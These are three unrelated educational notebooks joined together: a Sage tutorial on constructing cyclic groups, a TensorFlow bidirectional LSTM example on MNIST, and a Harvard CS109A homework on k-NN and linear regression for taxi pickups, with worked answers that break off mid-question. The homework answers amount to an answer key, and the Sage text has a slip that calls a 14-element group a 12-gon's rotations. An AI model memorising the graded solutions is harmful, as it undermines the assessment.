<div class="mathbook-content"><h2 class="heading hide-type" alt="Section 4.7 Sage"><span class="type">Section</span><span class="codenumber">4.7</span><span class="title">Sage</span></h2><a href="cyclic-sage.ipynb" class="permalink">ยถ</a></div>
<div class="mathbook-content"></div>
<div class="mathbook-content"><p id="p-747">Cyclic groups are very important, so it is no surprise that they appear in many different forms in Sage. Each is slightly different, and no one implementation is ideal for an introduction, but together they can illustrate most of the important ideas. Here is a guide to the various ways to construct, and study, a cyclic group in Sage.</p></div>
<div class="mathbook-content"><h3 class="heading hide-type" alt="Subsection Infinite Cyclic Groups"><span class="type">Subsection</span><span class="codenumber" /><span class="title">Infinite Cyclic Groups</span></h3></div>
<div class="mathbook-content"><p id="p-748">In Sage, the integers $\mathbb Z$ are constructed with <code class="code-inline tex2jax_ignore">ZZ</code>. To build the infinite cyclic group such as $3\mathbb Z$ from Exampleย <a href="section-cyclic-subgroups.ipynb#example-cyclic-z3" class="xref" alt="Example 4.1 " title="Example 4.1 ">4.1</a>, simply use <code class="code-inline tex2jax_ignore">3*ZZ</code>. As an infinite set, there is not a whole lot you can do with this. You can test if integers are in this set, or not. You can also recall the generator with the <code class="code-inline tex2jax_ignore">.gen()</code> command.</p></div>
```
G = 3*ZZ
-12 in G
37 in G
G.gen()
```
<div class="mathbook-content"><h3 class="heading hide-type" alt="Subsection Additive Cyclic Groups"><span class="type">Subsection</span><span class="codenumber" /><span class="title">Additive Cyclic Groups</span></h3></div>
<div class="mathbook-content"><p id="p-749">The additive cyclic group $\mathbb Z_n$ can be built as a special case of a more general Sage construction. First we build $\mathbb Z_{14}$ and capture its generator. Throughout, pay close attention to the use of parentheses and square brackets for when you experiment on your own.</p></div>
```
G = AdditiveAbelianGroup([14])
G.order()
G.list()
a = G.gen(0)
a
```
<div class="mathbook-content"><p id="p-750">You can compute in this group, by using the generator, or by using new elements formed by coercing integers into the group, or by taking the result of operations on other elements. And we can compute the order of elements in this group. Notice that we can perform repeated additions with the shortcut of taking integer multiples of an element.</p></div>
```
a + a
a + a + a + a
4*a
37*a
```
<div class="mathbook-content"><p id="p-751">We can create, and then compute with, new elements of the group by coercing an integer (in a list of length $1$) into the group. You may get a <code class="code-inline tex2jax_ignore">DeprecationWarning</code> the first time you use this syntax to create a new element. The mysterious warning can be safely ignored.</p></div>
```
G([2])
b = G([2]); b
b + b
2*b == 4*a
7*b
b.order()
c = a - 6*b; c
c + c + c + c
c.order()
```
<div class="mathbook-content"><p id="p-752">It is possible to create cyclic subgroups, from an element designated to be the new generator. Unfortunately, to do this requires the <code class="code-inline tex2jax_ignore">.submodule()</code> method (which should be renamed in Sage).</p></div>
```
H = G.submodule([b]); H
H.list()
H.order()
e = H.gen(0); e
3*e
e.order()
```
<div class="mathbook-content"><p id="p-753">The cyclic subgroup <code class="code-inline tex2jax_ignore">H</code> just created has more than one generator. We can test this by building a new subgroup and comparing the two subgroups.</p></div>
```
f = 12*a; f
f.order()
K = G.submodule([f]); K
K.order()
K.list()
K.gen(0)
H == K
```
<div class="mathbook-content"><p id="p-754">Certainly the list of elements, and the common generator of <code class="code-inline tex2jax_ignore">(2)</code> lead us to belive that <code class="code-inline tex2jax_ignore">H</code> and <code class="code-inline tex2jax_ignore">K</code> are the same, but the comparison in the last line leaves no doubt.</p></div>
<div class="mathbook-content"><p id="p-755">Results in this section, especially Theoremย <a href="section-cyclic-subgroups.ipynb#theorem-cyclic-orders" class="xref" alt="Theorem 4.13 " title="Theorem 4.13 ">4.13</a> and Corollaryย <a href="section-cyclic-subgroups.ipynb#corollary-cyclic-modngenerators" class="xref" alt="Corollary 4.14 " title="Corollary 4.14 ">4.14</a>, can be investigated by creating generators of subgroups from a generator of one additive cyclic group, creating the subgroups, and computing the orders of both elements and orders of groups.</p></div>
<div class="mathbook-content"><h3 class="heading hide-type" alt="Subsection Abstract Multiplicative Cyclic Groups"><span class="type">Subsection</span><span class="codenumber" /><span class="title">Abstract Multiplicative Cyclic Groups</span></h3></div>
<div class="mathbook-content"><p id="p-756">We can create an abstract cyclic group in the style of Theoremsย <a href="section-cyclic-subgroups.ipynb#theorem-cyclic-subgroup" class="xref" alt="Theorem 4.3 " title="Theorem 4.3 ">4.3</a>, <a href="section-cyclic-subgroups.ipynb#theorem-cyclic-abelian" class="xref" alt="Theorem 4.9 " title="Theorem 4.9 ">4.9</a>, <a href="section-cyclic-subgroups.ipynb#theorem-cyclic-subgroups" class="xref" alt="Theorem 4.10 " title="Theorem 4.10 ">4.10</a>. In the syntax below <code class="code-inline tex2jax_ignore">a</code> is a name for the generator, and <code class="code-inline tex2jax_ignore">14</code> is the order of the element. Notice that the notation is now multiplicative, so we multiply elements, and repeated products can be written as powers.</p></div>
```
G.<a> = AbelianGroup([14])
G.order()
G.list()
a.order()
```
<div class="mathbook-content"><p id="p-757">Computations in the group are similar to before, only with different notation. Now products, with repeated products written as exponentiation.</p></div>
```
b = a^2
b.order()
b*b*b
c = a^7
c.order()
c^2
b*c
b^37*c^42
```
<div class="mathbook-content"><p id="p-758">Subgroups can be formed with a <code class="code-inline tex2jax_ignore">.subgroup()</code> command. But do not try to list the contents of a subgroup, it'll look strangely unfamiliar. Also, comparison of subgroups is not implemented.</p></div>
```
H = G.subgroup([a^2])
H.order()
K = G.subgroup([a^12])
K.order()
L = G.subgroup([a^4])
H == L
```
<div class="mathbook-content"><p id="p-759">One advantage of this implementation is the possibility to create all possible subgroups. Here we create the list of subgroups, extract one in particular (the third), and check its order.</p></div>
```
allsg = G.subgroups(); allsg
sub = allsg[2]
sub.order()
```
<div class="mathbook-content"><h3 class="heading hide-type" alt="Subsection Cyclic Permutation Groups"><span class="type">Subsection</span><span class="codenumber" /><span class="title">Cyclic Permutation Groups</span></h3></div>
<div class="mathbook-content"><p id="p-760">We will learn more about permutation groups in the next chapter. But we will mention here that it is easy to create cyclic groups as permutation groups, and a variety of methods are available for working with them, even if the actual elements get a bit cumbersome to work with. As before, notice that the notation and syntax is multiplicative.</p></div>
```
G=CyclicPermutationGroup(14)
a = G.gen(0); a
b = a^2
b = a^2; b
b.order()
a*a*b*b*b
c = a^37*b^26; c
c.order()
```
<div class="mathbook-content"><p id="p-761">We can create subgroups, check their orders, and list their elements.</p></div>
```
H = G.subgroup([a^2])
H.order()
H.gen(0)
H.list()
```
<div class="mathbook-content"><p id="p-762">It could help to visualize this group, and the subgroup, as rotations of a regular $12$-gon with the vertices labeled with the integers $1$ through $12\text{.}$ This is not the full group of symmetries, since it does not include reflections, just the $12$ rotations.</p></div>
<div class="mathbook-content"><h3 class="heading hide-type" alt="Subsection Cayley Tables"><span class="type">Subsection</span><span class="codenumber" /><span class="title">Cayley Tables</span></h3></div>
<div class="mathbook-content"><p id="p-763">As groups, each of the examples above (groups and subgroups) have Cayley tables implemented. Since the groups are cyclic, and their subgroups are therefore cyclic, the Cayley tables should have a similar โcyclicโ pattern. Note that the letters used in the default table are generic, and are not related to the letters used above for specific elements โ they just match up with the group elements in the order given by <code class="code-inline tex2jax_ignore">.list()</code>.</p></div>
```
G.<a> = AbelianGroup([14])
G.cayley_table()
```
<div class="mathbook-content"><p id="p-764">If the real names of the elements are not too complicated, the table could be more informative using these names.</p></div>
```
K.<b> = AbelianGroup([10])
K.cayley_table(names='elements')
```
<div class="mathbook-content"><h3 class="heading hide-type" alt="Subsection Complex Roots of Unity"><span class="type">Subsection</span><span class="codenumber" /><span class="title">Complex Roots of Unity</span></h3></div>
<div class="mathbook-content"><p id="p-765">The finite cyclic subgroups of ${\mathbb T}\text{,}$ generated by a primitive $n$th root of unity are implemented as a more general construction in Sage, known as a cyclotomic field. If you concentrate on just the multiplication of powers of a generator (and ignore the infinitely many other elements) then this is a finite cyclic group. Since this is not implemented directly in Sage as a group, <i class="foreign">per se</i>, it is a bit harder to construct things like subgroups, but it is an excellent exercise to try. It is a nice example since the complex numbers are a concrete and familiar construction. Here are a few sample calculations to provide you with some exploratory tools. See the notes following the computations.</p></div>
```
G = CyclotomicField(14)
w = G.gen(0); w
wc = CDF(w)
wc.abs()
wc.arg()/N(2*pi/14)
b = w^2
b.multiplicative_order()
bc = CDF(b); bc
bc.abs()
bc.arg()/N(2*pi/14)
sg = [b^i for i in range(7)]; sg
c = sg[3]; d = sg[5]
c*d
c = sg[3]; d = sg[6]
c*d in sg
c*d == sg[2]
sg[5]*sg[6] == sg[4]
G.multiplication_table(elements=sg)
```
<div class="mathbook-content"><p id="p-766">Notes:</p><ol class="decimal"><li id="li-190"><p id="p-767"><code class="code-inline tex2jax_ignore">zeta14</code> is the name of the generator used for the cyclotomic field, it is a primitive root of unity (a $14$th root of unity in this case). We have captured it as <code class="code-inline tex2jax_ignore">w</code>.</p></li><li id="li-191"><p id="p-768">The syntax <code class="code-inline tex2jax_ignore">CDF(w)</code> will convert the complex number <code class="code-inline tex2jax_ignore">w</code> into the more familiar form with real and imaginary parts.</p></li><li id="li-192"><p id="p-769">The method <code class="code-inline tex2jax_ignore">.abs()</code> will return the modulus of a complex number, $r$ as described in the text. For elements of ${\mathbb C}^\ast$ this should always equal $1\text{.}$</p></li><li id="li-193"><p id="p-770">The method <code class="code-inline tex2jax_ignore">.arg()</code> will return the argument of a complex number, $\theta$ as described in the text. Every element of the cyclic group in this example should have an argument that is an integer multiple of $\frac{2\pi}{14}\text{.}$ The <code class="code-inline tex2jax_ignore">N()</code> syntax converts the symbolic value of <code class="code-inline tex2jax_ignore">pi</code> to a numerical approximation.</p></li><li id="li-194"><p id="p-771"><code class="code-inline tex2jax_ignore">sg</code> is a list of elements that form a cyclic subgroup of order 7, composed of the first 7 powers of <code class="code-inline tex2jax_ignore">b = w^2</code>. So, for example, the last comparison multiplies the fifth power of <code class="code-inline tex2jax_ignore">b</code> with the sixth power of <code class="code-inline tex2jax_ignore">b</code>, which would be the eleventh power of <code class="code-inline tex2jax_ignore">b</code>. But since <code class="code-inline tex2jax_ignore">b</code> has order 7, this reduces to the fourth power.</p></li><li id="li-195"><p id="p-772">If you know a subset of an infinite group forms a subgroup, then you can produce its Cayley table by specifying the list of elements you want to use. Here we ask for a multiplication table, since that is the relevant operation.</p></li></ol></div>
# Bi-directional Recurrent Neural Network Example
Build a bi-directional recurrent neural network (LSTM) with TensorFlow 2.0.
- Author: Aymeric Damien
- Project: https://github.com/aymericdamien/TensorFlow-Examples/
## BiRNN Overview
<img src="https://ai2-s2-public.s3.amazonaws.com/figures/2016-11-08/191dd7df9cb91ac22f56ed0dfa4a5651e8767a51/1-Figure2-1.png" alt="nn" style="width: 600px;"/>
References:
- [Long Short-Term Memory](http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf), Sepp Hochreiter & Jürgen Schmidhuber, Neural Computation 9(8): 1735-1780, 1997.
## MNIST Dataset Overview
This example is using MNIST handwritten digits. The dataset contains 60,000 examples for training and 10,000 examples for testing. The digits have been size-normalized and centered in a fixed-size image (28x28 pixels) with values from 0 to 1. For simplicity, each image has been flattened and converted to a 1-D numpy array of 784 features (28*28).

To classify images using a recurrent neural network, we consider every image row as a sequence of pixels. Because MNIST image shape is 28*28px, we will then handle 28 sequences of 28 timesteps for every sample.
More info: http://yann.lecun.com/exdb/mnist/
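As a quick sanity check on that shape convention (a small sketch, not part of the original example), a flattened 784-pixel image reshapes into 28 rows, which the bidirectional LSTM reads as 28 timesteps of 28 features:

```
import numpy as np

flat_image = np.zeros(784, dtype=np.float32)   # one flattened MNIST image
sequence = flat_image.reshape(28, 28)          # 28 timesteps x 28 features (one image row per timestep)
batch = sequence[np.newaxis, ...]              # add a batch dimension
print(batch.shape)                             # (1, 28, 28) == (batch, timesteps, features)
```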
```
from __future__ import absolute_import, division, print_function
# Import TensorFlow v2.
import tensorflow as tf
from tensorflow.keras import Model, layers
import numpy as np
# MNIST dataset parameters.
num_classes = 10 # total classes (0-9 digits).
num_features = 784 # data features (img shape: 28*28).
# Training Parameters
learning_rate = 0.001
training_steps = 1000
batch_size = 32
display_step = 100
# Network Parameters
# MNIST images are 28*28 px; each image is treated as 28 timesteps of 28 features (one row per timestep).
num_input = 28 # number of features per timestep (pixels per image row).
timesteps = 28 # number of timesteps (image rows).
num_units = 32 # number of neurons for the LSTM layer.
# Prepare MNIST data.
from tensorflow.keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# Convert to float32.
x_train, x_test = np.array(x_train, np.float32), np.array(x_test, np.float32)
# Reshape images into sequences of 28 rows of 28 pixels (timesteps x features).
x_train, x_test = x_train.reshape([-1, timesteps, num_input]), x_test.reshape([-1, timesteps, num_input])
# Normalize images value from [0, 255] to [0, 1].
x_train, x_test = x_train / 255., x_test / 255.
# Use tf.data API to shuffle and batch data.
train_data = tf.data.Dataset.from_tensor_slices((x_train, y_train))
train_data = train_data.repeat().shuffle(5000).batch(batch_size).prefetch(1)
# Create LSTM Model.
class BiRNN(Model):
# Set layers.
def __init__(self):
super(BiRNN, self).__init__()
# Define 2 LSTM layers for forward and backward sequences.
lstm_fw = layers.LSTM(units=num_units)
lstm_bw = layers.LSTM(units=num_units, go_backwards=True)
# BiRNN layer.
self.bi_lstm = layers.Bidirectional(lstm_fw, backward_layer=lstm_bw)
# Output layer (num_classes).
self.out = layers.Dense(num_classes)
# Set forward pass.
def call(self, x, is_training=False):
x = self.bi_lstm(x)
x = self.out(x)
if not is_training:
# tf cross entropy expect logits without softmax, so only
# apply softmax when not training.
x = tf.nn.softmax(x)
return x
# Build LSTM model.
birnn_net = BiRNN()
# Cross-Entropy Loss.
# Note that this will apply 'softmax' to the logits.
def cross_entropy_loss(x, y):
# Convert labels to int 64 for tf cross-entropy function.
y = tf.cast(y, tf.int64)
# Apply softmax to logits and compute cross-entropy.
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=x)
# Average loss across the batch.
return tf.reduce_mean(loss)
# Accuracy metric.
def accuracy(y_pred, y_true):
# Predicted class is the index of highest score in prediction vector (i.e. argmax).
correct_prediction = tf.equal(tf.argmax(y_pred, 1), tf.cast(y_true, tf.int64))
return tf.reduce_mean(tf.cast(correct_prediction, tf.float32), axis=-1)
# Adam optimizer.
optimizer = tf.optimizers.Adam(learning_rate)
# Optimization process.
def run_optimization(x, y):
# Wrap computation inside a GradientTape for automatic differentiation.
with tf.GradientTape() as g:
# Forward pass.
pred = birnn_net(x, is_training=True)
# Compute loss.
loss = cross_entropy_loss(pred, y)
# Variables to update, i.e. trainable variables.
trainable_variables = birnn_net.trainable_variables
# Compute gradients.
gradients = g.gradient(loss, trainable_variables)
# Update W and b following gradients.
optimizer.apply_gradients(zip(gradients, trainable_variables))
# Run training for the given number of steps.
for step, (batch_x, batch_y) in enumerate(train_data.take(training_steps), 1):
# Run the optimization to update W and b values.
run_optimization(batch_x, batch_y)
if step % display_step == 0:
pred = birnn_net(batch_x, is_training=True)
loss = cross_entropy_loss(pred, batch_y)
acc = accuracy(pred, batch_y)
print("step: %i, loss: %f, accuracy: %f" % (step, loss, acc))
```
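The training loop above never evaluates on the held-out digits. A minimal evaluation sketch (assuming `x_test` has been reshaped to `[-1, 28, 28]` as in the preparation step, and reusing the `accuracy` helper defined above):

```
# Evaluate the trained model on the full test set.
x_test_seq = np.asarray(x_test, np.float32).reshape([-1, timesteps, num_input])
pred_test = birnn_net(x_test_seq, is_training=False)
print("Test accuracy: %f" % accuracy(pred_test, y_test))
```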
# <img style="float: left; padding-right: 10px; width: 45px" src="https://raw.githubusercontent.com/Harvard-IACS/2018-CS109A/master/content/styles/iacs.png"> CS109A Introduction to Data Science:
## Homework 2: Linear and k-NN Regression
**Harvard University**<br/>
**Fall 2019**<br/>
**Instructors**: Pavlos Protopapas, Kevin Rader, and Chris Tanner
<hr style="height:2pt">
```
#RUN THIS CELL
import requests
from IPython.core.display import HTML
styles = requests.get("https://raw.githubusercontent.com/Harvard-IACS/2018-CS109A/master/content/styles/cs109.css").text
HTML(styles)
```
### INSTRUCTIONS
- To submit your assignment follow the instructions given in canvas.
- As much as possible, try and stick to the hints and functions we import at the top of the homework, as those are the ideas and tools the class supports and is aiming to teach. And if a problem specifies a particular library you're required to use that library, and possibly others from the import list.
- Restart the kernel and run the whole notebook again before you submit.
- Please use .head() when viewing data. Do not submit a notebook that is excessively long because output was not suppressed.
<hr style="height:2pt">
```
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
from sklearn.metrics import r2_score
from sklearn.neighbors import KNeighborsRegressor
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
import statsmodels.api as sm
from statsmodels.api import OLS
%matplotlib inline
```
## <div class="theme"> <b>Predicting Taxi Pickups in NYC</b> </div>
In this homework, we will explore k-nearest neighbor and linear regression methods for predicting a quantitative variable. Specifically, we will build regression models that can predict the number of taxi pickups in New York city at any given time of the day. These prediction models will be useful, for example, in monitoring traffic in the city.
The data set for this problem is given in the file `nyc_taxi.csv`. You will need to separate it into training and test sets. The first column contains the time of day in minutes, and the second column contains the number of pickups observed at that time. The data set covers taxi pickups recorded in NYC during January 2015.
We will fit regression models that use the time of the day (in minutes) as a predictor and predict the average number of taxi pickups at that time. The models will be fitted to the training set and evaluated on the test set. The performance of the models will be evaluated using the $R^2$ metric.
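As a reminder (not part of the assignment hand-out), $R^2$ compares the model's squared prediction error to that of a baseline that always predicts the mean $\bar{y}$ of the observed responses:

$$
R^2 = 1 - \frac{\sum_i (y_i - \hat{y}_i)^2}{\sum_i (y_i - \bar{y})^2},
$$

so $R^2 = 1$ means perfect predictions, $R^2 = 0$ means no better than the mean, and $R^2 < 0$ means worse than the mean.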
### <div class="exercise"> <b> Question 1 [20 pts]</b> </div>
**1.1**. Use pandas to load the dataset from the csv file `nyc_taxi.csv` into a pandas data frame. Use the `train_test_split` method from `sklearn` with a `random_state` of 42 and a `test_size` of 0.2 to split the dataset into training and test sets. Store your train set data frame as `train_data` and your test set data frame as `test_data`.
**1.2**. Generate a scatter plot of the training data points with clear labels on the x and y axes to demonstrate how the number of taxi pickups is dependent on the time of the day. Be sure to title your plot.
**1.3**. In a few sentences, describe the general pattern of taxi pickups over the course of the day and explain why this is a reasonable result.
**1.4**. You should see a *hole* in the scatter plot when `TimeMin` is 500-550 minutes and `PickupCount` is roughly 20-30 pickups. Briefly surmise why this may be the case. This will not be graded harshly, we just want you to think and communicate about the cause.
### Answers
**1.1 Use pandas to load the dataset from the csv file ...**
```
df = pd.read_csv('data/nyc_taxi.csv')
print(df.head(10))
train_data, test_data = train_test_split(df, test_size=0.2, random_state=42)
```
**1.2 Generate a scatter plot of the training data points**
```
def convert_hours(minutes):
    minutes = int(minutes)
    hour = (minutes // 60) % 12 or 12  # use 12 rather than 0 on a 12-hour clock
    return '%d:%s%s' % (hour, str(minutes % 60).zfill(2), 'AM' if minutes < 720 else 'PM')
time = []
for t_min in range(0, 1440, 60):
time.append(convert_hours(t_min))
#print ('%d min is %s' % (t_min, convert_hours(t_min)))
plt.rcParams["figure.figsize"] = (20,10)
plt.scatter(train_data['TimeMin'].values, train_data['PickupCount'].values)
plt.xlabel('Time of day in minutes')
plt.ylabel('Number of pickups')
plt.title('NYC Taxi pickups by time of day')
plt.xticks(np.arange(0, 1380, step=60),time)
plt.show()
```
**1.3 In a few sentences, describe the general pattern of taxi pickups over the course of the day and explain why this is a reasonable result.**
Peak taxi time should be in the mid- to late evening (1100-1440 min), with spikes around the times when restaurants and clubs close (around 12am-2am, or 0-120 min). This matches our observations in the scatter plot. In addition, we would expect a minor peak around the time when people are going to work, which should be around 6:30-8:30am, or 390-510min. This expected spike also appears in the plot.
**1.4 You should see a *hole* in the scatter plot when `TimeMin` is 500-550 minutes...**
```
subset = df.loc[(df['TimeMin'] >= 500) & (df['TimeMin'] <= 550)].sort_values(by='TimeMin')
subset['TimeHours'] = [convert_hours(x) for x in subset['TimeMin']]
print(subset)
```
Looking at the subset data above, we see either low or high values for identical times. The simplest explanation is that this is peak commuting time, so the low numbers represent Sat/Sun and the high numbers represent weekdays. We could take this into account for our model if weekday is also an available predictor.
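One quick, optional check of the two-cluster picture inside that window (a sketch; the 25-pickup cutoff is simply eyeballed from the scatter plot):

```
window = df.loc[(df['TimeMin'] >= 500) & (df['TimeMin'] <= 550), 'PickupCount']
print(window.describe())
print((window < 25).value_counts())   # rough split between the low (weekend?) and high (weekday?) cluster
```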
<hr>
### <div class="exercise"> <b>Question 2 [25 pts]</b> </div>
In lecture we've seen k-Nearest Neighbors (k-NN) Regression, a non-parametric regression technique. In the following problems please use the built-in functionality from `sklearn` to run k-NN Regression.
**2.1**. Choose `TimeMin` as your feature variable and `PickupCount` as your response variable. Create a dictionary of `KNeighborsRegressor` objects and call it `KNNModels`. Let the key for your `KNNmodels` dictionary be the value of $k$ and the value be the corresponding `KNeighborsRegressor` object. For $k \in \{1, 10, 75, 250, 500, 750, 1000\}$, fit k-NN regressor models on the training set (`train_data`).
**2.2**. For each $k$, overlay a scatter plot of the actual values of `PickupCount` vs. `TimeMin` in the training set with a scatter plot of **predictions** for `PickupCount` vs `TimeMin`. Do the same for the test set. You should have one figure with 7 x 2 total subplots; for each $k$ the figure should have two subplots, one subplot for the training set and one for the test set.
**Hints**:
1. Each subplot should use different color and/or markers to distinguish k-NN regression prediction values from the actual data values.
2. Each subplot must have appropriate axis labels, title, and legend.
3. The overall figure should have a title.
**2.3**. Report the $R^2$ score for the fitted models on both the training and test sets for each $k$ (reporting the values in tabular form is encouraged).
**2.4**. Plot, in a single figure, the $R^2$ values from the model on the training and test set as a function of $k$.
**Hints**:
1. Again, the figure must have axis labels and a legend.
2. Differentiate $R^2$ plots on the training and test set by color and/or marker.
3. Make sure the $k$ values are sorted before making your plot.
**2.5**. Discuss the results:
1. If $n$ is the number of observations in the training set, what can you say about a k-NN regression model that uses $k = n$?
2. What does an $R^2$ score of $0$ mean?
3. What would a negative $R^2$ score mean? Are any of the calculated $R^2$ you observe negative?
4. Do the training and test $R^2$ plots exhibit different trends? Describe.
5. What is the best value of $k$? How did you come to choose this value? How do the corresponding training/test set $R^2$ values compare?
6. Use the plots of the predictions (in 2.2) to justify why your choice of the best $k$ makes sense (**Hint**: think Goldilocks).
### Answers
**2.1 Choose `TimeMin` as your feature variable and `PickupCount` as your response variable. Create a dictionary...**
```
def single_pred(df):
return df.values.reshape(-1, 1)
def fitKNN(k, data):
knr = KNeighborsRegressor(n_neighbors=k)
knr.fit(single_pred(data['TimeMin']), data['PickupCount'].values)
return knr
KNNmodels = dict()
k_vals = [1, 10, 75, 250, 500, 750, 1000]
for k in k_vals:
KNNmodels[k] = fitKNN(k, train_data)
```
**2.2 For each $k$, overlay a scatter plot of the actual values of `PickupCount` vs. `TimeMin` in the training set...**
```
i = 1
plt.figure(figsize=(10, 12))
predictions = {'train': dict(), 'test': dict()}
for k in k_vals:
for t in ['train', 'test']:
plt.subplot(7, 2, i)
i += 1
data = {'train': train_data, 'test': test_data}[t]
predictions[t][k] = KNNmodels[k].predict(single_pred(data['TimeMin']))
plt.scatter(data['TimeMin'].values, data['PickupCount'].values)
plt.scatter(data['TimeMin'].values, predictions[t][k])
plt.xlabel('Time of day in minutes')
plt.ylabel('Number of pickups')
plt.title("Actual and predicted pickups for k=%d (%s)" % (k, t))
plt.legend(['actual', 'predicted'])
plt.subplots_adjust(top=3, wspace=0.4, hspace=0.4)
plt.suptitle("NYC Taxi pickup predictions for different k values", fontsize=18, x=.5, y=3.05)
plt.show()
```
**2.3 Report the $R^2$ score for the fitted models on both the training and test sets for each $k$ (reporting the values in tabular form is encouraged).**
```
r2 = pd.DataFrame(columns=['k', 'Type', 'R-squared'])
for k in k_vals:
for t in ['train', 'test']:
data = {'train': train_data, 'test': test_data}[t]
r2 = r2.append({'k': k,
'Type': t,
'R-squared': r2_score(data['PickupCount'].values, predictions[t][k])},
ignore_index=True)
display(r2)
```
**2.4 Plot, in a single figure, the $R^2$ values from the model on the training and test set as a function of $k$.**
```
tr, tst = r2.loc[r2['Type'] == 'train'], r2.loc[r2['Type'] == 'test']
plt.plot(tr['k'].values, tr['R-squared'].values)
plt.plot(tst['k'].values, tst['R-squared'].values)
plt.legend(['Training Accuracy', 'Test Accuracy'])
plt.xlabel("Nearest neighbor count (k)")
plt.ylabel('R-squared value')
plt.title('R-squared versus k-value')
```
**2.5 Discuss the results:**
1. If $n$ is the number of observations in the training set, what can you say about a k-NN regression model that uses $k = n$?
When $k = n$, every prediction is simply the mean of the training responses, since all $n$ training points are included in each neighborhood (see the sketch after this discussion).
2. What does an $R^2$ score of $0$ mean?
An $R^2$ score of $0$ means the model explains none of the variance in the response: its predictions are no better than always predicting the mean of the observed values. This is approximately what we see for $k=1000$, where the k-NN prediction collapses toward the overall mean (the sketch after this discussion confirms that a constant mean prediction scores exactly $R^2 = 0$).
3. What would a negative $R^2$ score mean? Are any of the calculated $R^2$ you observe negative?
A negative $R^2$ means the model predicts even worse than always using the mean of the observed responses (it does not indicate negative correlation). We see a negative score for $k=1$ on the test set, which indicates severe overfitting to our training data.
4. Do the training and test $R^2$ plots exhibit different trends? Describe.
The training $R^2$ plot starts at a high value and drops as $k$ increases, which we would expect given that our KNN model is fitting very closely to the training data at low $k$. The test plot exhibits a very different trend, with $R^2$ starting negative, rising to a peak around $k=75$, and falling off to converge with the training plot at high values of $k$. This makes sense because training and test error should converge as $k$ rises, but when the value is too high, the KNN model reverts towards a simple mean prediction, yielding worse $R^2$ values on both training and test data.
5. What is the best value of $k$? How did you come to choose this value? How do the corresponding training/test set $R^2$ values compare?
$k=75$ yields the best test $R^2$ value, and is therefore the best value for this data set. The training and test $R^2$ values are fairly close together, with test slightly lower than training. The $R^2$ divergence drops as $k$ rises.
6. Use the plots of the predictions (in 2.2) to justify why your choice of the best $k$ makes sense (**Hint**: think Goldilocks).
In this case, our Goldilocks principle would suggest that the best $k$ value achieves relatively high test $R^2$ with relatively low difference between training and test $R^2$ values. In other words, it captures the training distribution well, but still demonstrates a capacity to generalize.
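The claims above about $k = n$ and about an $R^2$ of $0$ can be verified directly. Below is a small sketch (not part of the required solution) that reuses the `single_pred` helper defined in 2.1:

```
n = len(train_data)
knn_all = KNeighborsRegressor(n_neighbors=n)
knn_all.fit(single_pred(train_data['TimeMin']), train_data['PickupCount'].values)

# With k = n, every prediction equals the mean of the training responses ...
print(knn_all.predict(single_pred(train_data['TimeMin'].iloc[:3])))
print(train_data['PickupCount'].mean())

# ... and a constant mean prediction scores exactly R^2 = 0 on the training set.
mean_pred = np.full(n, train_data['PickupCount'].mean())
print(r2_score(train_data['PickupCount'].values, mean_pred))
```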
<hr>
### <div class="exercise"> <b> Question 3 [25 pts] </b></div>
We next consider simple linear regression, which we know from lecture is a parametric approach for regression that assumes that the response variable has a linear relationship with the predictor. Use the `statsmodels` module for Linear Regression. This module has built-in functions to summarize the results of regression and to compute confidence intervals for estimated regression parameters.
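For reference, the `statsmodels` workflow used in the answers below is: add an explicit intercept column with `sm.add_constant`, fit with `OLS(...).fit()`, and then query the results object. A minimal sketch (the actual fit for this question is done in 3.1):

```
X = sm.add_constant(train_data['TimeMin'])   # adds an explicit intercept column named 'const'
fit = OLS(train_data['PickupCount'], X).fit()
fit.params                                   # estimated intercept and slope
fit.conf_int(alpha=0.05)                     # 95% confidence intervals for both parameters
fit.rsquared                                 # R^2 on the data used for fitting
```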
**3.1**. Again choose `TimeMin` as your predictor and `PickupCount` as your response variable. Create an `OLS` class instance and use it to fit a Linear Regression model on the training set (`train_data`). Store your fitted model in the variable `OLSModel`.
**3.2**. Create a plot just like you did in 2.2 (but with fewer subplots): plot both the observed values and the predictions from `OLSModel` on the training and test set. You should have one figure with two subplots, one subplot for the training set and one for the test set.
**Hints**:
1. Each subplot should use different color and/or markers to distinguish Linear Regression prediction values from that of the actual data values.
2. Each subplot must have appropriate axis labels, title, and legend.
3. The overall figure should have a title.
**3.3**. Report the $R^2$ score for the fitted model on both the training and test sets.
**3.4**. Report the estimates for the slope and intercept for the fitted linear model.
**3.5**. Report the $95\%$ confidence intervals (CIs) for the slope and intercept.
**3.6**. Discuss the results:
1. How does the test $R^2$ score compare with the best test $R^2$ value obtained with k-NN regression? Describe why this is not surprising for these data.
2. What does the sign of the slope of the fitted linear model convey about the data?
3. Interpret the $95\%$ confidence intervals from 3.5. Based on these CIs is there evidence to suggest that the number of taxi pickups has a significant linear relationship with time of day? How do you know?
4. How would $99\%$ confidence intervals for the slope and intercept compare to the $95\%$ confidence intervals (in terms of midpoint and width)? Briefly explain your answer.
5. Based on the data structure, what restriction on the model would you put at the endpoints (at $x\approx0$ and $x\approx1440$)? What does this say about the appropriateness of a linear model?
### Answers
**3.1 Again choose `TimeMin` as your predictor and `PickupCount` as your response variable...**
```
train_data_X = sm.add_constant(train_data['TimeMin'])
model = OLS(train_data['PickupCount'], train_data_X)
```
**3.2 Create a plot just like you did in 2.2 (but with fewer subplots)...**
```
results = model.fit()
i = 1
plt.figure(figsize=(10, 2))
plt.subplots_adjust(top=2, wspace=0.4, hspace=0.4)
plt.suptitle("NYC Taxi pickup predictions OLS train and test", fontsize=18, x=.5, y=2.3)
OLS_predictions = dict()
for t in ['train', 'test']:
plt.subplot(1, 2, i)
i += 1
data = {'train': train_data, 'test': test_data}[t]
data_X = sm.add_constant(data['TimeMin'])
OLS_predictions[t] = results.predict(data_X)
plt.scatter(data['TimeMin'].values, data['PickupCount'].values)
plt.plot(data['TimeMin'].values, OLS_predictions[t], color='orange')
plt.xlabel('Time of day in minutes')
plt.ylabel('Number of pickups')
plt.title("Actual and predicted pickups with OLS (%s)" % t)
    plt.legend(['actual', 'predicted'])
```
**3.3 Report the $R^2$ score for the fitted model on both the training and test sets.**
```
for t in ['train', 'test']:
data = {'train': train_data, 'test': test_data}[t]
